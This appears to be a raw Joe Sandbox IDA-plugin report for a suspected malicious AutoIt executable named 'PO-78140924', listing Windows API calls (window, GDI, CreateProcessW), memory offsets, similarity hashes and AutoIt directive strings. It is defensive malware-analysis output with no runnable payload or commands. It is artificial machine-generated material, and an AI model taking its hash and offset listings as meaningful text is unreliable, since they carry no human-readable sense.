                                                • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                                • String ID:
                                                • API String ID: 2356834413-0
                                                • Opcode ID: ebb33503a5fdf4a282e1fec3160fccf56e3a3c7893a5312c8fb74402ab7e03ba
                                                • Instruction ID: e2f6b9bca30312b14cbb31a631b195c52c287156827df0fa5f79dcdd74fe491b
                                                • Opcode Fuzzy Hash: ebb33503a5fdf4a282e1fec3160fccf56e3a3c7893a5312c8fb74402ab7e03ba
                                                • Instruction Fuzzy Hash: 1AF05E34204228ABDF14AE09DC19EBE3B91EB04351F004026F9555B2A2CB75A960EFE0
                                                APIs
                                                  • Part of subcall function 00012612: GetWindowLongW.USER32(?,000000EB), ref: 00012623
                                                • NtdllDialogWndProc_W.NTDLL(?,00000006,00000000,?,?), ref: 000118E2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                Similarity
                                                • API ID: DialogLongNtdllProc_Window
                                                • String ID:
                                                • API String ID: 2065330234-0
                                                • Opcode ID: 7b95b98bcd8976ed0726a3a18a6c0c2d955276ab1c150fda167ec38b5760d76b
                                                • Instruction ID: d742a2e418e5bf72be51f23700ba5519b6eba1ed330d08cfc1b044aa0c03dcbb
                                                • Opcode Fuzzy Hash: 7b95b98bcd8976ed0726a3a18a6c0c2d955276ab1c150fda167ec38b5760d76b
                                                • Instruction Fuzzy Hash: DAF03034600615DFDB18DF14DC50AE537E1EB44351F60811AFD514B2A1CB3598A0AB60
                                                APIs
                                                • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 0009C968
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                Similarity
                                                • API ID: DialogNtdllProc_
                                                • String ID:
                                                • API String ID: 3239928679-0
                                                • Opcode ID: c95f4bef3417d43dbf7d7ca52f9b11765506a8235784cc764f058c35bcb721ba
                                                • Instruction ID: 7d4e29dabfa8e33e2491288d1d7c3e1d6f746ae6341e7abd7b94e86b1c4f566e
                                                • Opcode Fuzzy Hash: c95f4bef3417d43dbf7d7ca52f9b11765506a8235784cc764f058c35bcb721ba
                                                • Instruction Fuzzy Hash: 36F06D31201795AFEF21DF58EC05FD63B95EB09321F148019BE15672E2CB747920E7A0
                                                APIs
                                                  • Part of subcall function 00012612: GetWindowLongW.USER32(?,000000EB), ref: 00012623
                                                • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 000116AB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                Similarity
                                                • API ID: DialogLongNtdllProc_Window
                                                • String ID:
                                                • API String ID: 2065330234-0
                                                • Opcode ID: a581bc4786b9e6b0d9275c26215444fda6abecbe0d9f86d2ddebe388e0802e88
                                                • Instruction ID: d67057deedb82243b764113d924b974c81d82bd8ce9ac1dc5bc66c4d76e098c9
                                                • Opcode Fuzzy Hash: a581bc4786b9e6b0d9275c26215444fda6abecbe0d9f86d2ddebe388e0802e88
                                                • Instruction Fuzzy Hash: 3CE0EC35100608FBDF05AF90DC11EA43B26FB48351F608419FA555A2A2CB36A962EB60
                                                APIs
                                                • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,?,?,?,?,?,0004BB3C,?,?), ref: 0009C99E
                                                  • Part of subcall function 0009B669: _memset.LIBCMT ref: 0009B678
                                                  • Part of subcall function 0009B669: _memset.LIBCMT ref: 0009B687
                                                  • Part of subcall function 0009B669: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,000D6F20,000D6F64), ref: 0009B6B6
                                                  • Part of subcall function 0009B669: CloseHandle.KERNEL32 ref: 0009B6C8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                Similarity
                                                • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                                • String ID:
                                                • API String ID: 2364484715-0
                                                • Opcode ID: d75d15a4f5d6df424ebdabd0a31abb7656df92a48aa4a9e9e941ed02e6ad1933
                                                • Instruction ID: ce5d77e148aad448dabc9ddfbe088407cc01134e4ab44ec7d00f00ea270a6638
                                                • Opcode Fuzzy Hash: d75d15a4f5d6df424ebdabd0a31abb7656df92a48aa4a9e9e941ed02e6ad1933
                                                • Instruction Fuzzy Hash: 0BE09231210609DFDF11AF44ED59E9937A5FB08355F014065FE05572B2C735AD60EF61
                                                APIs
                                                  • Part of subcall function 00012612: GetWindowLongW.USER32(?,000000EB), ref: 00012623
                                                  • Part of subcall function 0001201B: DestroyWindow.USER32(?), ref: 000120D3
                                                  • Part of subcall function 0001201B: KillTimer.USER32(-00000001,?,?,?,?,000116CB,00000000,?), ref: 0001216E
                                                • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?), ref: 000116D4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                Similarity
                                                • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                                • String ID:
                                                • API String ID: 2797419724-0
                                                • Opcode ID: 8b847860c7045d97124479e6a91277726e86c993f0e0022452397cc00ccaeb34
                                                • Instruction ID: 75a51cc8c0d958c804a3c2f58778739926d10f88f91a85915b9567aa5b65fbd0
                                                • Opcode Fuzzy Hash: 8b847860c7045d97124479e6a91277726e86c993f0e0022452397cc00ccaeb34
                                                • Instruction Fuzzy Hash: 72D01270140708B7DB112B50DC17FD93A199B58751F508021BB04691D3CA75A870A568
                                                APIs
                                                • NtdllDialogWndProc_W.NTDLL ref: 0009C8EF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: DialogNtdllProc_
                                                • String ID:
                                                • API String ID: 3239928679-0
                                                • Opcode ID: 54e3e32415a6d833a03a2fa6fb45f4f26d9eb320f14f10638897ff6c41afc7aa
                                                • Instruction ID: be21d914fe4d65ccafdd0e96bbd10a8cc9a04f128ebda3222a2bc557c3de568d
                                                • Opcode Fuzzy Hash: 54e3e32415a6d833a03a2fa6fb45f4f26d9eb320f14f10638897ff6c41afc7aa
                                                • Instruction Fuzzy Hash: 54E0E235200649EFDB01DF88DC84E963BA5BB1D301F014055FE0557262CB71A820EB61
                                                APIs
                                                • NtdllDialogWndProc_W.NTDLL ref: 0009C91E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: DialogNtdllProc_
                                                • String ID:
                                                • API String ID: 3239928679-0
                                                • Opcode ID: ad8d085d2f778ed2fbc6aa41d92f40376b1f39091124bf04f47eb99e942cba48
                                                • Instruction ID: 814f325b27fc8bc8f24f7fee60c887b47b4566629d701bed223901c14fe2fdcc
                                                • Opcode Fuzzy Hash: ad8d085d2f778ed2fbc6aa41d92f40376b1f39091124bf04f47eb99e942cba48
                                                • Instruction Fuzzy Hash: 48E0E235200649EFDB01DF88D844D963BA5BB1D300F014055FE0547262CB71A820EBA1
                                                APIs
                                                • NtdllDialogWndProc_W.NTDLL(?,?), ref: 000119FA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: DialogNtdllProc_
                                                • String ID:
                                                • API String ID: 3239928679-0
                                                • Opcode ID: ec39a82c6084d2fd6a7db55fec7d7a978d3a82bca3c238033001e9e2bd54a4d9
                                                • Instruction ID: f873048a0127ee54e2ccf6a0662d5d92d4da54e8ebef1fba47455ad868e843bd
                                                • Opcode Fuzzy Hash: ec39a82c6084d2fd6a7db55fec7d7a978d3a82bca3c238033001e9e2bd54a4d9
                                                • Instruction Fuzzy Hash: 42C0483320541AAE9B129E84BD049EE7B29FB98362B204527FB129002293264432AB65
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0003A2AA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: 92f3dd0ff590b49467668d00df22d23afa5eb422a106a059818b3bf568094d3b
                                                • Instruction ID: 87d18e3223004e9cd118957b0b1659dd14a150391811e90ee61bbf04a5a9bf81
                                                • Opcode Fuzzy Hash: 92f3dd0ff590b49467668d00df22d23afa5eb422a106a059818b3bf568094d3b
                                                • Instruction Fuzzy Hash: AFA0123000010DE78A001B51EC044547F5CE7001907008021F40C8002187B655504580
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                • Instruction ID: 3587bb4acef734d7e986c181eb5ec64e26c8f2fc4d9101c42c451e340f81bc77
                                                • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                • Instruction Fuzzy Hash: 49C183322051930ADBAF4639843417EFEE95FA67B271A076DE4B3CB0D5EF20C564D620
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                • Instruction ID: 312b1e18b2ca6710dfb7f741db91258995a42cb41db2fec581939efcf02148e9
                                                • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                • Instruction Fuzzy Hash: A6C173322151930ADFAF463A843417EBFE95BA67B271A076DE4B2DB1C5EF20C524D620
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                • Instruction ID: 305ff9cf97c142c2c925870caa60d7b2c3fe7203d673346cebd46b67ff157b95
                                                • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                • Instruction Fuzzy Hash: 69C1A3322051930EDFAF4639847407EBEE95BA67B271A076DE4B3CB1C5EF20D528D620
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                • Instruction ID: f7cadb08bff44aa938e5d3ba9313c8c4cf62e7b6ac8227b0729f95ee699c6a29
                                                • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                • Instruction Fuzzy Hash: B8C172322151930DDFAF463984340BEBEE95BAA7B271A176DE4B3CB1C5EF20C524D620
                                                APIs
                                                • SetTextColor.GDI32(?,00000000), ref: 0009A662
                                                • GetSysColorBrush.USER32(0000000F), ref: 0009A693
                                                • GetSysColor.USER32(0000000F), ref: 0009A69F
                                                • SetBkColor.GDI32(?,000000FF), ref: 0009A6B9
                                                • SelectObject.GDI32(?,00000000), ref: 0009A6C8
                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 0009A6F3
                                                • GetSysColor.USER32(00000010), ref: 0009A6FB
                                                • CreateSolidBrush.GDI32(00000000), ref: 0009A702
                                                • FrameRect.USER32(?,?,00000000), ref: 0009A711
                                                • DeleteObject.GDI32(00000000), ref: 0009A718
                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 0009A763
                                                • FillRect.USER32(?,?,00000000), ref: 0009A795
                                                • GetWindowLongW.USER32(?,000000F0), ref: 0009A7C0
                                                  • Part of subcall function 0009A8FC: GetSysColor.USER32(00000012), ref: 0009A935
                                                  • Part of subcall function 0009A8FC: SetTextColor.GDI32(?,?), ref: 0009A939
                                                  • Part of subcall function 0009A8FC: GetSysColorBrush.USER32(0000000F), ref: 0009A94F
                                                  • Part of subcall function 0009A8FC: GetSysColor.USER32(0000000F), ref: 0009A95A
                                                  • Part of subcall function 0009A8FC: GetSysColor.USER32(00000011), ref: 0009A977
                                                  • Part of subcall function 0009A8FC: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0009A985
                                                  • Part of subcall function 0009A8FC: SelectObject.GDI32(?,00000000), ref: 0009A996
                                                  • Part of subcall function 0009A8FC: SetBkColor.GDI32(?,00000000), ref: 0009A99F
                                                  • Part of subcall function 0009A8FC: SelectObject.GDI32(?,?), ref: 0009A9AC
                                                  • Part of subcall function 0009A8FC: InflateRect.USER32(?,000000FF,000000FF), ref: 0009A9CB
                                                  • Part of subcall function 0009A8FC: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0009A9E2
                                                  • Part of subcall function 0009A8FC: GetWindowLongW.USER32(00000000,000000F0), ref: 0009A9F7
                                                  • Part of subcall function 0009A8FC: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0009AA1F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                • String ID:
                                                • API String ID: 3521893082-0
                                                • Opcode ID: cd3a384d50a2b0e209bd24677c43015e20d438a221f3271aa2f79c0ccdb813b9
                                                • Instruction ID: 2f693a96da4af6414748374c594142296d581ebedb94bad00a80a8b7e7fde45e
                                                • Opcode Fuzzy Hash: cd3a384d50a2b0e209bd24677c43015e20d438a221f3271aa2f79c0ccdb813b9
                                                • Instruction Fuzzy Hash: C8917071108702EFDB109F64DC08A6BBBE9FF89321F100B2AF562D61A1C775D944DB92
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: __wcsnicmp
                                                • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                • API String ID: 1038674560-86951937
                                                • Opcode ID: 6db4dd9b01a6d5fb20e7ea19487cd4bd8004f2e409650a7e6bfc33d59e49ec68
                                                • Instruction ID: e9d4ad90c17c49adcae810e5639f48316a4a87c025ad496bf132dc3a7a734d6c
                                                • Opcode Fuzzy Hash: 6db4dd9b01a6d5fb20e7ea19487cd4bd8004f2e409650a7e6bfc33d59e49ec68
                                                • Instruction Fuzzy Hash: FC8135B0604206BACB21AF65CCC2FFF77ACAF15750F044035F945AA183EB62DAD1C6A5
                                                APIs
                                                • DestroyWindow.USER32(?,?,?), ref: 00012CA2
                                                • DeleteObject.GDI32(00000000), ref: 00012CE8
                                                • DeleteObject.GDI32(00000000), ref: 00012CF3
                                                • DestroyCursor.USER32(00000000), ref: 00012CFE
                                                • DestroyWindow.USER32(00000000,?,?,?), ref: 00012D09
                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 0004C5BB
                                                • 6F540200.COMCTL32(?,000000FF,?), ref: 0004C5F4
                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0004CA1D
                                                  • Part of subcall function 00011B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00012036,?,00000000,?,?,?,?,000116CB,00000000,?), ref: 00011B9A
                                                • SendMessageW.USER32(?,00001053), ref: 0004CA5A
                                                • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0004CA71
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: DestroyMessageSendWindow$DeleteObject$CursorF540200InvalidateMoveRect
                                                • String ID: 0
                                                • API String ID: 22932394-4108050209
                                                • Opcode ID: 218eaf554bf64929b27ae639258d4dd950b15658440efa2cef0d1cc3a9587945
                                                • Instruction ID: 5d4cda65e618657a8724e89d323186e8632b36b113117a09a8b44a7d7f02a4c6
                                                • Opcode Fuzzy Hash: 218eaf554bf64929b27ae639258d4dd950b15658440efa2cef0d1cc3a9587945
                                                • Instruction Fuzzy Hash: 1B128E70605202EFEBA4CF24C888FA9B7E5BF45300F544579E995CB262CB31EC91CB95
                                                APIs
                                                • GetSysColor.USER32(00000012), ref: 0009A935
                                                • SetTextColor.GDI32(?,?), ref: 0009A939
                                                • GetSysColorBrush.USER32(0000000F), ref: 0009A94F
                                                • GetSysColor.USER32(0000000F), ref: 0009A95A
                                                • CreateSolidBrush.GDI32(?), ref: 0009A95F
                                                • GetSysColor.USER32(00000011), ref: 0009A977
                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0009A985
                                                • SelectObject.GDI32(?,00000000), ref: 0009A996
                                                • SetBkColor.GDI32(?,00000000), ref: 0009A99F
                                                • SelectObject.GDI32(?,?), ref: 0009A9AC
                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 0009A9CB
                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0009A9E2
                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0009A9F7
                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0009AA1F
                                                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0009AA46
                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 0009AA64
                                                • DrawFocusRect.USER32(?,?), ref: 0009AA6F
                                                • GetSysColor.USER32(00000011), ref: 0009AA7D
                                                • SetTextColor.GDI32(?,00000000), ref: 0009AA85
                                                • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0009AA99
                                                • SelectObject.GDI32(?,0009A62C), ref: 0009AAB0
                                                • DeleteObject.GDI32(?), ref: 0009AABB
                                                • SelectObject.GDI32(?,?), ref: 0009AAC1
                                                • DeleteObject.GDI32(?), ref: 0009AAC6
                                                • SetTextColor.GDI32(?,?), ref: 0009AACC
                                                • SetBkColor.GDI32(?,?), ref: 0009AAD6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                • String ID:
                                                • API String ID: 1996641542-0
                                                • Opcode ID: 509778713678f12214e649b2e50c82dd5ab2170a27a3b5d0dc6c8f257326c799
                                                • Instruction ID: 49bc923bd341f3f53435a0fb7482e713e3ab197df7f3ccf27f8370c0dfa84e84
                                                • Opcode Fuzzy Hash: 509778713678f12214e649b2e50c82dd5ab2170a27a3b5d0dc6c8f257326c799
                                                • Instruction Fuzzy Hash: B9511A71900209FFEF119FA4DC48AAEBBB9FB49320F114626F911EB2A1D7759940DB90
                                                APIs
                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000128BC
                                                • GetSystemMetrics.USER32(00000007), ref: 000128C4
                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000128EF
                                                • GetSystemMetrics.USER32(00000008), ref: 000128F7
                                                • GetSystemMetrics.USER32(00000004), ref: 0001291C
                                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00012939
                                                • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00012949
                                                • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0001297C
